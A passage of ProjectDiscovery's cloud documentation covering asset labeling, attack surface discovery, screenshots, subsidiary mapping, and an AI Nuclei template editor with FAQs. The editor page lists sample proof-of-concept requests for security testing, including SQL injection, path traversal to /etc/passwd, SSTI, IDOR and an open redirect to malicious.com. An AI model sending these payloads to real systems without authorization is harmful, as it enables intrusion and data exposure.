* **Reduces Manual Effort:** One of the biggest benefits is cutting down the tedious work of labeling assets by hand. In the past, teams might maintain spreadsheets or use tagging systems to mark which assets are production, which are internal, which belong to a certain team, etc. ProjectDiscovery's automated approach does this heavy lifting for you. As soon as assets are discovered, the platform annotates them with relevant labels, sparing you from examining each asset individually and typing out tags. This automation frees up your time to focus on higher-value tasks like analyzing findings or improving security controls.
* **Speeds Up Security Triage:** With assets automatically categorized, you can prioritize and triage security issues faster. When a new vulnerability or incident is reported, having labeled assets means you instantly know the context. For example, if an alert comes in for *api.test.example.com*, an "API" label and perhaps a "Staging" label on that asset will tell you it's a staging API server. You can then decide the urgency (maybe lower than a production issue) and the appropriate team to notify. Without having to dig for this information, response times improve. In short, labels act as immediate context clues that help you quickly determine the criticality of an asset and the impact of any associated vulnerabilities.
* **Better Asset Management & Organization:** Asset labels make it much easier to organize and filter your asset inventory. You can group assets by their labels to get different views of your attack surface. For instance, you might filter to see all assets labeled "Production" to ensure you're focusing scans and monitoring on live customer-facing systems, or you might pull up all assets labeled "Login Portal" to review authentication points in your infrastructure. This capability turns a flat list of assets into a richly organized dataset that can be sliced and diced for various purposes. It enhances visibility across your environment – you can quickly answer questions like "How many external login pages do we have?" or "Which assets are running database services?" if such labels are applied. Ultimately, this leads to more structured and efficient asset management.
* **Consistency and Scale:** Automated labeling applies the same criteria uniformly across all assets, ensuring consistent classification. Human tagging can be subjective – different team members might label similar assets differently or overlook some assets entirely. With ProjectDiscovery doing it automatically, every asset is evaluated with the same logic, and nothing gets skipped due to oversight. This consistency is especially important when you have hundreds or thousands of assets in dynamic cloud environments. The feature scales effortlessly – no matter how many assets you discover overnight, each will get labeled without adding to anyone's workload. As your attack surface grows, automated labeling keeps the context up-to-date continuously, which is crucial for maintaining an accurate asset inventory in fast-changing environments.
In summary, automated asset labeling streamlines asset management by eliminating manual tagging drudgery, accelerating the interpretation of asset data, and bringing order and clarity to your inventory. It's an efficiency boost that also improves the quality of your security posture by ensuring you always know what each asset is and why it's there.
# Asset Discovery and Exposure Management
Source: https://docs.projectdiscovery.io/cloud/assets/overview
Next-generation attack surface management and asset discovery platform
Attack Surface Management (ASM) has evolved from basic asset enumeration into a sophisticated process that continuously discovers, classifies, and monitors all assets vulnerable to attack. Modern organizations face ever‐expanding digital footprints spanning traditional internet-facing systems, dynamic cloud environments, and complex distributed services. ProjectDiscovery redefines ASM by combining proven open‑source techniques with advanced cloud‑native capabilities. This unified platform delivers instant insights—through a search‑like experience and deep reconnaissance—ensuring comprehensive coverage and real‑time visibility into your entire infrastructure. In essence, it lets your security team see your organization's attack surface as an attacker would, leaving no blind spots.
This document outlines the core workflows and architectural components of ProjectDiscovery's ASM and Exposure Management. It is designed to help new users quickly understand how the system works and to provide a structured, yet developer‑friendly, overview for security and engineering teams.
***
## Platform Architecture
Our next‑generation asset discovery platform is built on a revolutionary three‑layer architecture developed through extensive collaboration with hundreds of security teams. Each layer plays a distinct role in mapping and monitoring your infrastructure.
### 1. External Discovery Layer
* **Instant Enumeration:** Leveraging our enhanced Chaos database, this layer delivers immediate results through pre‑indexed data for hundreds of thousands of domains.
* **Deep Reconnaissance:** Active reconnaissance methods (advanced DNS brute‑forcing, permutation analysis, certificate transparency log monitoring) supplement instant results.
* **ASN Mapping:** Sophisticated ASN correlation (ASNMap) uncovers hidden relationships by mapping IP ranges associated with your organization. This network‑level insight expands your visibility beyond known domains.
* **Third‑Party Data & Subsidiary Discovery:** Integration with external sources (e.g., Shodan, Censys, FOFA) and subsidiary detection mechanisms automatically identify related brands and assets—ensuring that acquired or lesser‑known entities are not overlooked.
### 2. Cloud Integration Layer
* **Real‑Time Cloud Asset Discovery:** Our enhanced Cloudlist engine connects natively with AWS, Azure, GCP, and more, continuously monitoring your cloud footprint.
* **Service & Configuration Monitoring:** Advanced heuristics identify exposed services and risky configurations in real‑time, while persistent API connections ensure your cloud inventory stays up‑to‑date.
* **Cross‑Cloud Correlation:** Cloud‑based assets are linked with ASN data and external discoveries to provide a unified view of your overall attack surface.
### 3. Asset Management Layer
* **Enrichment & Classification:** Raw asset data is transformed through multi‑stage analysis. Comprehensive DNS analysis, HTTP probing (with screenshots and technology fingerprinting), and certificate evaluation work together to create detailed asset profiles.
* **Automated Labeling:** AI‑powered models automatically categorize and tag assets based on their characteristics, behavior patterns, and risk profiles. Users can also define custom labels and apply bulk labeling to further organize assets by environment, ownership, or risk.
* **Graph‑Based Relationship Mapping:** Advanced mapping visualizes complex asset relationships and attack paths, providing actionable intelligence for prioritizing security efforts.
***
## Key Workflows & Features
Automatically discover and track all external-facing and internal assets using integrated tools like Subfinder, Naabu, Httpx, and more
Organize assets with AI-generated and custom labels for efficient management and prioritization
Capture visual snapshots of web assets for quick identification of exposed interfaces
Automatically map and manage assets across multiple subsidiaries and brands
Native integration with major cloud providers for comprehensive asset discovery
Seamless integration with Nuclei-powered scanning for comprehensive security assessment
***
## Best Practices & Next Steps
* **Enable Continuous Scanning:** Schedule regular asset discovery and vulnerability scans to ensure your inventory remains current.
* **Leverage Labels Effectively:** Develop a consistent labeling scheme that reflects your organizational structure (e.g. by environment, department, or risk level) to prioritize remediation efforts.
* **Integrate with Your Workflow:** Set up integrations with alerting systems (Slack, Teams, email) and ticketing tools (Jira, GitHub) to automate notifications and track remediation.
* **Review & Update Regularly:** Periodically audit your asset inventory to remove stale entries and adjust labels as your infrastructure evolves.
* **Explore Advanced Features:** Once you're comfortable with the basics, dive into additional features such as customized filtering, dynamic grouping, and deeper cloud integrations to further refine your exposure management.
***
By following this guide, new users can quickly grasp the full capabilities of ProjectDiscovery's ASM and Exposure Management. The integrated workflows—from asset discovery and enrichment to continuous monitoring and vulnerability assessment—provide a robust, real‑time view of your infrastructure, empowering your security team to proactively secure your attack surface. Enjoy the streamlined, automated approach to managing your organization's exposure with ProjectDiscovery!
# Asset Screenshots
Source: https://docs.projectdiscovery.io/cloud/assets/screenshots
Visual catalog of your discovered assets for quick security assessment
The Screenshots feature is currently in beta and operates asynchronously. After asset discovery, there may be a delay before screenshots become available as they are processed in the background. This current limitation is temporary while we work on infrastructure optimizations to make screenshot generation instant.
We are actively working on:
* Reducing screenshot generation time
* Implementing real-time processing
* Scaling our infrastructure to handle concurrent screenshot requests
* Making the feature more widely available to all users
During the beta period, you may experience longer wait times for screenshots to appear in your dashboard. We appreciate your patience as we enhance this feature to provide instant visual insights for all users.
The *Screenshots* feature automatically captures and catalogs visual snapshots of web assets identified during your discovery process. In practice, this means that for each discovered web service, an image of its web page is saved for you to review. These screenshots provide a quick visual summary of what was found, allowing you to identify interesting or anomalous web pages at a glance. All captured images are organized alongside asset data, so security teams can easily browse them without manually visiting each site.
**How this helps:** By seeing the actual rendered pages, you can spot login portals, dashboards, error pages, or other telling visuals immediately. This added context enriches your asset inventory beyond raw URLs and metadata, giving you an at-a-glance understanding of each asset's interface and content.
## How It Works (Technical Process)
Under the hood, the screenshot feature uses a headless browser to load each web page and take a snapshot of it. When asset discovery with screenshots is initiated, the system will launch a browser engine (Chrome in headless mode) to fully render the target page (including HTML, CSS, and JavaScript) before capturing the image. Because of this rendering step, screenshot generation is **resource-intensive** and **time-consuming**. Each page needs to load as if you opened it in a real browser, which introduces processing delays.
In the current beta implementation, screenshots are taken **asynchronously**. This means the initial asset discovery can complete and return results before all screenshots are finished. The images will continue to be captured in the background and will appear in your asset catalog once ready. As a result, you might notice a gap between discovering an asset and seeing its screenshot. This is normal in the beta – the feature prioritizes completing the discovery process first, then works on rendering pages for snapshots.
## Why Use Screenshots?
Traditionally, after discovering new web assets, security engineers would **manually inspect** each site to understand what it is. This might involve copying URLs into a browser or using separate tools to capture site images. For large numbers of assets, that manual approach is tedious and time‑consuming. Important details could be missed if an analyst doesn't have time to check every single site.
The screenshots feature automates this **visual assessment** step. Instead of manually visiting dozens or hundreds of websites, the system automatically provides you with a gallery of each site's front page. This saves considerable time and effort – without automation, teams often had to write custom scripts (for example, using Selenium to take browser snapshots) or even rerun their discovery with a separate screenshot tool just to capture images. Now, that process is integrated: as soon as an asset is found, a screenshot is queued up for it. Security teams can quickly scroll through the captured images to triage assets, prioritize investigation, and spot anything visually unusual or interesting. In essence, **Screenshots turn a once-manual, one-by-one review into an automated, at-scale process**, letting you cover more ground faster.
**Use case example:** If your discovery process finds an unknown subdomain hosting a login page, the screenshot will show you the login form and branding. This immediate context might tell you that the site is an admin portal, which is valuable information for risk assessment. Without the screenshot, you might have overlooked that subdomain or delayed investigating it until you could manually check it. By automating this, the feature ensures no discovered web asset goes visually unchecked.
# Subsidiary & Multi-Organization Management
Source: https://docs.projectdiscovery.io/cloud/assets/subsidiary
Discover and manage assets across multiple organizations, subsidiaries, and brands
Need advanced workflows or custom subsidiary management? Our team can help set up enterprise-grade configurations tailored to your infrastructure. [Talk to our team](https://projectdiscovery.io/request-demo) to discuss your specific requirements.
Modern enterprises frequently have complex infrastructures spread across many domains and business units. ProjectDiscovery's platform is designed to give security teams **instant visibility into the entire organizational attack surface**, including assets belonging to subsidiaries, acquired companies, and separate brands. It does so by automating asset discovery and correlation on a global scale. The platform acts as a centralized inventory where all web properties, cloud resources, and external facing systems tied to an organization are cataloged together, regardless of which subsidiary or team they belong to.
ProjectDiscovery built its cloud platform with **end-to-end exposure management workflows** that continuously discover assets and monitor them in real-time. This means as your organization grows – launching new websites, spinning up cloud services, or acquiring companies – the platform automatically updates your asset inventory and keeps track of new potential entry points. In short, ProjectDiscovery provides a *"single pane of glass"* for enterprise security teams to oversee multi-organization infrastructures.
## Challenges in Traditional Subsidiary Asset Discovery
Tracking assets across multiple organizations or subsidiaries is notoriously difficult when done manually. Security teams traditionally had to compile lists of subsidiary domains and networks from internal knowledge or public records, then run separate scans for each – a time-consuming and error-prone process. Some common challenges include:
* **Incomplete Visibility:** Large organizations might have dozens of subsidiaries or brand domains, and each may host numerous applications. Manually mapping all these entities is a huge challenge. In practice, many enterprises have "hundreds or even thousands of related entities," making it *"difficult to get a clear picture of their full attack surface"*. Important assets can be overlooked simply because they were not on the main corporate domain.
* **Constant Change:** Mergers, acquisitions, and divestitures mean the set of assets is constantly evolving. Without continuous updates, asset inventories become outdated quickly. IP addresses and domains can change ownership or get spun up and down rapidly in cloud environments. Keeping track of these changes manually is untenable.
* **Fragmented Data Sources:** Information about subsidiaries is often scattered (e.g. in financial databases, press releases, WHOIS records). As a result, mapping out which domains or systems are owned by your company (versus third parties) can require extensive research. This fragmentation leads to **blind spots** in security monitoring.
* **Risk of Unknown Assets:** Perhaps the biggest risk is that **unknown or unmanaged assets can lead to security incidents**. If a security team is only monitoring the primary organization's domains, a forgotten website under a subsidiary could become an easy target. As one security engineer described, without a centralized view "*new assets could pop up without our knowledge, creating potential vulnerabilities like subdomain takeovers*". In other words, attackers might exploit an obscure subsidiary's forgotten cloud bucket or an old acquisition's server if the defenders aren't even aware it exists.
These challenges mean that traditional approaches (spreadsheets of subsidiaries, manual scans, etc.) often fail to provide complete coverage. Security teams end up reactive – finding out about a subsidiary's exposure only after an incident or external report. Clearly, a more automated, scalable solution is needed for subsidiary and multi-organization asset management.
## How ProjectDiscovery Solves This Problem
ProjectDiscovery's platform introduces automated features that **eliminate the manual legwork** of subsidiary asset discovery. It leverages external data and intelligent correlation to map out an enterprise's entire digital footprint across all related organizations, with minimal user input. Key capabilities include:
* **Automated Subsidiary Correlation:** ProjectDiscovery integrates with the Crunchbase API to automatically identify which companies and domains are associated with your organization. As soon as you onboard, the platform pulls in known subsidiaries and related entities from Crunchbase's extensive corporate database. This means security teams *immediately* see a list of subsidiaries and their known domains without having to manually research corporate filings or news articles. By using this external intelligence, ProjectDiscovery can **map subsidiaries to assets** and help track associated assets across \[your] entire corporate structure.
* **Seamless Onboarding of Subsidiary Assets:** The platform presents this extended view during onboarding – giving users an instant snapshot of their organization's broad footprint as they set up their account. Instead of starting with a blank slate, an enterprise user logging into ProjectDiscovery for the first time might immediately see that the platform has identified, for example, *"SubsidiaryX.com, SubsidiaryY.net, and BrandZ.com"* as belonging to their company. This **jump-starts the asset inventory** by automatically including the web properties of all child organizations. Such visibility, right at onboarding, ensures no major branch of the business is initially overlooked.
* **Recognition of Brands and Owned Domains:** Subsidiary discovery in ProjectDiscovery isn't limited to exact company names – it also helps surface related domains or brands. For example, if your organization owns multiple product brands each with their own website, the platform can recognize those as part of your attack surface. It correlates various clues (DNS records, SSL certificates, WHOIS info, etc.) to cluster assets by ownership. As a result, security teams get a unified view of everything "owned" by the broader organization, even if operated under different names.
* **Continuous Enrichment and Updates:** ProjectDiscovery's asset correlation is not a one-time static pull. It is continuously being enhanced. Upcoming improvements will use **reverse WHOIS lookups** to find additional owned domains and associated entities that might not be obvious from corporate listings. This will further expand coverage by catching assets that share registration details or contact emails with the organization. The platform is also opening up these discovery capabilities via API for the community, so its subsidiary detection engine will keep getting smarter over time. For the security team, this means the asset inventory grows and updates automatically as new information surfaces – without manual effort.
By automating subsidiary and multi-organization asset discovery, ProjectDiscovery **saves countless hours** of manual mapping and drastically reduces the chances of missing a part of your attack surface. Security teams no longer need to maintain separate inventories or perform ad-hoc research whenever the company expands; the platform handles it for them in the background. All assets across the parent company and its subsidiaries funnel into one consolidated inventory for monitoring.
# AI Assistance
Source: https://docs.projectdiscovery.io/cloud/editor/ai
Review details on using AI to help generate templates for Nuclei and ProjectDiscovery
[The Template Editor](https://cloud.projectdiscovery.io/) has AI to generate templates for vulnerability reports. This document helps to guide you through the process, offering usagwe tips and examples.
## Overview
Powered by ProjectDiscovery's deep library of public Nuclei templates and a rich CVE data set, the AI understands a broad array of security vulnerabilities. First, the system interprets the user's prompt to identify a specific vulnerability. Then, it generates a template based on the steps required to reproduce the vulnerability along with all the necessary meta information to reproduce and remediate.
## Initial Setup
Kick start your AI Assistance experience with these steps:
1. **Provide Detailed Information**: Construct comprehensive Proof of Concepts (PoCs) for vulnerabilities like Cross-Site Scripting (XSS), and others.
2. **Understand the Template Format**: Get to grips with the format to appropriately handle and modify the generated template.
3. **Validation and Linting**: Use the integrated linter to guarantee the template's validity.
4. **Test the Template**: Evaluate the template against a test target ensuring its accuracy.
## Best Practices
* **Precision Matters**: Detailed prompts yield superior templates.
* **Review and Validate**: Consistently check matchers' accuracy.
* **Template Verification**: Validate the template on known vulnerable targets before deployment.
## Example Prompts
The following examples demonstrate different vulnerabilities and the corresponding Prompt.
Open redirect vulnerability identified in a web application. Here's the PoC:
HTTP Request:
```
GET /redirect?url=http://malicious.com HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
```
HTTP Response:
```
HTTP/1.1 302 Found
Location: http://malicious.com
Content-Length: 0
Server: Apache
```
The application redirects the user to the URL specified in the url parameter, leading to an open redirect vulnerability.
SQL Injection vulnerability in a login form. Here's the PoC:
HTTP Request:
```
POST /login HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
username=admin&password=' OR '1'='1
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Welcome back, admin
...
```
The application improperly handles user input in the password field, leading to an SQL Injection vulnerability.
Business Logic vulnerability in a web application's shopping cart function allows for negative quantities, leading to credit. Here's the PoC:
HTTP Request:
```
POST /add-to-cart HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
product_id=1001&quantity=-1
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Product added to cart. Current balance: -$19.99
...
```
The application fails to validate the quantity parameter, resulting in a Business Logic vulnerability.
Server-side Template Injection (SSTI) vulnerability through a web application's custom greeting card function. Here's the PoC:
```
HTTP Request:
POST /create-card HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
message={{7*7}}
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Your card: 49
...
```
The application processes the message parameter as a template, leading to an SSTI vulnerability.
Insecure Direct Object Reference (IDOR) vulnerability discovered in a website's user profile page. Here's the PoC:
```
HTTP Request:
GET /profile?id=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Cookie: session=abcd1234
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Welcome, otheruser
...
```
The application exposes sensitive information of a user (ID: 2) who is not the authenticated user (session: abcd1234), leading to an IDOR vulnerability.
Path Traversal vulnerability identified in a web application's file download function. Here's the PoC:
```
HTTP Request:
GET /download?file=../../etc/passwd HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1827
Server: Apache
root:x:0:0:root:/root:/bin/bash
```
The application fetches the file specified in the file parameter from the server file system, leading to a Path Traversal vulnerability.
Business logic vulnerability in a web application's VIP subscription function allows users to extend the trial period indefinitely. Here's the PoC:
```
HTTP Request:
POST /extend-trial HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Cookie: session=abcd1234
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
Your VIP trial period has been extended by 7 days.
```
The application does not limit the number of times the trial period can be extended, leading to a business logic vulnerability.
Each of these examples provides HTTP Requests and Responses to illustrate the vulnerabilities.
## Limitations
Please note that the current AI is trained primarily on HTTP data. Template generation for non-HTTP protocols is not supported at this time. Support for additional protocols is under development and will be available soon.
# Templates & Editor FAQ
Source: https://docs.projectdiscovery.io/cloud/editor/faq
Answers to common questions about Nuclei templates and our cloud platform template editor
Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) are the core of the Nuclei project and ProjectDiscovery Cloud Platform. The templates contain the actual logic that is executed in order to detect various vulnerabilities.
The ProjectDiscovery template library contains **several thousand** ready-to-use **[community-contributed](https://github.com/projectdiscovery/nuclei-templates/graphs/contributors)** vulnerability templates. We are continuously working with our open source community
to update and add templates as vulnerabilities are discovered.
We maintain a [template guide](/templates/introduction/) for writing new and
custom Nuclei templates. ProjectDiscovery Cloud Platform also provides AI
support to assist in writing and testing custom templates. - Check out our
documentation on the [Templates Editor](/cloud/editor/ai) for more
information.
Performing security assessment of an application is time-consuming. It's always better and time-saving to automate steps whenever possible. Once you've found a security vulnerability, you can prepare a Nuclei template by defining the required HTTP request to reproduce the issue, and test the same vulnerability across multiple hosts with ease.
It's worth mentioning ==you write the template once and use it forever==, as you don't need to manually test that specific vulnerability any longer.
Here are few examples from the community making use of templates to automate the security findings:
* [https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/](https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/)
* [https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning](https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning)
* [https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites](https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites)
* [https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state](https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state)
* [https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out](https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out)
* [https://projectdiscovery.io/blog/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities](https://projectdiscovery.io/blog/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities)
Nuclei templates are selected as part of any scans you create. You can select pre-configured groups of templates, individual templates, or add your own custom templates as part of your scan configuration.
* Check out [the scanning documentation]('/cloud/scanning/overview') to learn more.
You are always welcome to share your templates with the community. You can
either open a [GitHub
issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=nuclei-template\&template=submit-template.md\&title=%5Bnuclei-template%5D+template-name)
with the template details or open a GitHub [pull
request](https://github.com/projectdiscovery/nuclei-templates/pulls) with your
Nuclei templates. If you don't have a GitHub account, you can also make use of
the [discord server](https://discord.gg/projectdiscovery) to share the
template with us.
You own any templates generated by the AI through the Template Editor. They
are your property, and you are granted a perpetual license to use and modify
them as you see fit.
The Template Editor feature in PDCP uses OpenAI.
Yes, prompts are stored as part of the generated template metadata. This data
is deleted as soon as the template or the user are deleted.
The accuracy of the generated templates is primarily dependent on the detail
and specificity of the input you provide. The more detailed information you
supply, the better the AI can understand the context and create an accurate
template. However, as with any AI tool, it is highly recommended to review,
validate, and test any generated templates before using them in a live
environment.
No, AI does not use the templates you generate for further training or
improvement of the AI model. The system only uses public templates and CVE
data for training, ensuring your unique templates remain confidential.
# Template Editor Overview
Source: https://docs.projectdiscovery.io/cloud/editor/overview
Learn more about using the Nuclei Templates Editor
For more in-depth information about Nuclei templates, including details on template structure and supported protocols [check out](/templates/introduction).
[The Template Editor](https://cloud.projectdiscovery.io/public/public-template) is a multi-functional cloud-hosted tool designed for creating, running, and sharing templates (Nuclei and ProjectDiscovery). It's packed with helpful features for individual and professional users seeking to manage and execute templates.
![Templates Editor](https://mintlify.s3.us-west-1.amazonaws.com/projectdiscovery/images/editor.jpg)
## Template Compatibility
In addition to the Template Editor, our cloud platform supports any templates compatible with [Nuclei](nuclei/overview). These templates are exactly the same powerful YAML format supported in open source.
Take a look at our [Templates](/Templates/introduction) documentation for a wealth of resources available around template design, structure, and how they can be customized to meet an enormous range of use cases. As always, if you have questions [we're here to help](/help/home).
## Features
Current and upcoming features:
| Feature | Description and Use | Availability |
| -------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ |
| **Editor** | Experience something akin to using VS Code with our integrated editor, built on top of Monaco. This feature allows easy writing and modification of Nuclei Templates. | Free |
| **Optimizer** | Leverage the in-built TemplateMan API to automatically lint, format, validate, and enhance your Nuclei Templates. | Free |
| **Scan (URL)** | Run your templates on a targeted URL to check their validity. | Free \* |
| **Debugger** | Utilize the in-built debugging function that displays requests and responses of your template scans, aiding troubleshooting and understanding template behavior. | Free |
| **Cloud Storage** | Store and access your Nuclei Templates securely anytime, anywhere using your account. | Free |
| **Sharing** | Share your templates for better collaboration by generating untraceable unique links. | Free |
| **AI Assistance** | Employ AI to craft Nuclei Templates based on the context of specified vulnerabilities. This feature simplifies template creation and tailors them to minimize the time required for creation. | Free \* |
| **Scan (LIST, CIDR, ASN)** | In the professional version, run scans on target lists, network ranges (CIDR), AS numbers (ASN). | Teams |
| **REST API** | In the professional version, fetch templates, call the AI, and perform scans remotely using APIs. | Teams |
| **PDCP Sync** | Sync your generated templates with our cloud platform for easy access and management, available in the professional version. | Teams |
## Free Feature Limitations
Some features available within the free tier have usage caps in place:
* **Scan (URL):** You're allowed up to **100** scans daily.
* **AI Assistance:** Up to **10** queries can be made each day.
The limitations, reset daily, ensure system integrity and availability while providing access to key functions.
## How to Get Started
Begin by ensuring you have an account. If not, sign up on [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io/sign-up) and follow the steps below:
1. Log in to your account at [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io).
2. Click on the "**Create new template**" button to open up a fresh editor.
3. Write and modify your template. The editor includes tools like syntax highlighting, snippet suggestions, and other features to simplify the process.
4. After writing your template, input your testing target and click the "**Scan**" button to authenticate your template's accuracy.
# Recommended
Source: https://docs.projectdiscovery.io/cloud/editor/recommended
Learn more about using recommended templates with ProjectDiscovery
The functionality described on this page is **only** available on
[ProjectDiscovery team account](https://projectdiscovery.io/pricing).
## Overview
When setting up a scan in our cloud platform you have the option to build your scan using custom templates, [all templates](https://github.com/projectdiscovery/nuclei-templates), or recommended templates.
**Recommended templates are a curated subset of the full template library designed for efficiently scanning your attack surface.**
This subset of templates, nearly 4000 in total, focuses on relevant and exploitable vulnerabilities, excluding informational templates and templates with the potential to generate false positives.
The curated set of recommended templates is available as a config file and can be viewed in the Nuclei repository - [recommended templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/config/recommended.yml), or withing the application.
Rather than a list, recommended templates are curated through defined filters.
*This approach ensures that the curated list remains up-to-date as new templates are added.*
Filtering for recommended templates includes:
* All template severities except info
* Type: http, tcp, or javascript
* Exclusion of the tags: tech, dos, fuzz, creds-stuffing, token-spray, osint
* Exclusion of specific templates the list is available for review here --> [recommended templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/config/recommended.yml)
If you have questions, reach out to us through [support@projectdiscovery.io](mailto:support@projectdiscovery.io).
# Template Sharing
Source: https://docs.projectdiscovery.io/cloud/editor/share
Learn about sharing templates
The Template Editor offers the ability to share any public templates, including the ones you create.
To share a template, click on the "Share" button to generate a link that can be sent to others.
## How to Share Public Templates
Public templates are designed for ease of sharing. You don't need to be authenticated to share them, meaning there's no need to log in. These templates are mapped with their Template ID, following a static URL pattern. For instance, a public template URL might resemble this: [https://cloud.projectdiscovery.io/public/CVE-2023-35078](https://cloud.projectdiscovery.io/public/CVE-2023-35078). In the given URL, `CVE-2023-35078` is the Template ID representing the template in the [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) project.
## How to Share User Templates
User templates, unlike public templates, require authentication for sharing. These templates are assigned a unique, UUID-based ID similar to YouTube's unlisted URLs for sharing purposes. This means anyone given the shared URL will be able to access the template.
## Revoking Access to Shared Templates
If at any point you want to limit the access to the shared template, it is as simple as changing the visibility of the template to private. After this change, the originally shared link will become inactive. However, you have the flexibility to share it again, which would generate a new unique ID.
Please remember, while sharing is easy, it's important to distribute the URL cautiously as the link allows full access to the shared template.
# Editor Keyboard Shortcuts
Source: https://docs.projectdiscovery.io/cloud/editor/shortcuts
Review keyboard shortcuts for Nuclei templates
The Template Editor is equipped with keyboard shortcuts to make it more efficient. You can use these shortcuts whether you're creating a new template or optimizing an existing one, enabling quicker actions without interfering with your workflow.
Here is a list of the actions, along with their corresponding shortcut keys and descriptions:
| **Action** | **Shortcut Key** | **Description** |
| --------------------- | ----------------------- | ------------------------------------------------------------ |
| Save Template | **CMD + S** | Saves the current template. |
| Duplicate Template | **CMD + D** | Creates a copy of a public template. |
| Execute Template | **CMD + SHIFT + SPACE** | Run a scan with the current template. |
| Share Template Link | **ALT + SHIFT + SPACE** | Generates a URL for sharing the current template. |
| Search Templates | **CMD + K** | Searches within your own templates. |
| Copy Template | **CMD + SHIFT + C** | Copies the selected template to your clipboard. |
| Show/Hide Side Bar | **CMD + B** | Toggles the visibility of the side bar. |
| Show/Hide Debug Panel | **CMD + SHIFT + M** | Toggles the visibility of the debug panel for extra insight. |
For Mac users, the CMD key is used for these shortcuts.
Non-Mac users (Windows and Linux) should use the CTRL key instead.
# Frequently Asked Questions
Source: https://docs.projectdiscovery.io/cloud/general-faq
## General
You can find our [terms of use](https://projectdiscovery.io/terms) here.
ProjectDiscovery is engineered for security and DevOps teams. Please include scan headers, whitelist your scan activities with your IT team, and limit scanning to authorized assets.
If you have questions, don't hesitate to reach out - [support@projectdiscovery.io](mailto:support@projectdiscovery.io)!
*Note: Unauthorized scans that lead to abuse reports will result in account suspension.*
ProjectDiscovery works best on chromium-based browsers.
If you can't find what you need in our documentation - [email us](mailto:support@projectdiscovery.io), we're here to help!
Yes, with a Pro subscription you can have up to 10 team members. If you need support for a larger team, [get in touch](mailto:sales@projectdiscovery.io) and we'll be happy to talk about a custom setup.
ProjectDiscovery treats all vulnerability data and custom templates as private customer data. We do not share or sell this data and maintain strict protocols internally to limit access to your data.
This also applies to any information entered into our [AI template editor](/cloud/editor/overview). We are SOC 2 compliant and our latest security reports can be requested from our Trust Center at security.projectdiscovery.io.
ProjectDiscovery data resides with our cloud infrastructure partners. We maintain several relationships with leading global cloud providers.
We are SOC 2 compliant and our latest security reports can be requested from our Trust Center at security.projectdiscovery.io.
We are working on an on-prem version of our cloud platform. Get in touch with us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io) to share more about your requirements and learn about our product roadmap for upcoming features.
## Pricing
Our Pro plan enables users to scan up to 1,000 unique assets per month. If you need higher scanning capacity for your workflows, please contact us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
A unique asset is a combination of host (subdomain or IP) and port. Once scanned, you can rescan any asset again without extra cost for the rest of the month.
Once you reach your limit, you will not be able to scan additional unique assets until your limits reset at the start of the next billing month.
You will be notified prior to running a scan if your scan exceeds the remaining count of unique assets in your billing month. You will have the option of proceeding with that scan and we will scan as many new unique assets as possible up to your limit.
You can also reconfigure your scan with fewer assets by applying filters to an asset group and clicking on “Start Vulnerability Scan” or deleting assets from an asset group by scrolling to the right and clicking on the kebab menu and “Delete”.
If you need higher scanning capacity for your workflows, please contact us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
For new users, visit [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) to sign up.
For existing users, visit **Settings –> Billing** to set up your subscription.
Changes to subscriptions are available in the Billing section of the Settings
page. If you are the team owner, you will also be able to view past invoices
under the Billing section of the Settings page.
You can cancel in the Billing section of the Settings page at any time.
Unfortunately, we do not offer full or partial refunds. If you have issues or
questions, contact
[support@projectdiscovery.io](mailto:support@projectdiscovery.io) and we will
do our best to help you out.
Our primary payment method is via credit card invoiced in USD. For ACH payments or other custom payment requirements, please reach out to [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
## Other FAQs
Are you looking for details about certain features? Check out our feature-specific FAQs for additional details.
* [Assets FAQ](/cloud/assets/overview)
* [Scanning FAQ](/cloud/scanning/overview)
* [Nuclei Templates FAQ](/cloud/editor/faq)
Questions about the product that you don't see covered here - we want to know!
Contact [support@projectdiscovery.io](mailto:support@projectdiscovery.io) with any recommendations or issues.
# Platform Integrations
Source: https://docs.projectdiscovery.io/cloud/integrations
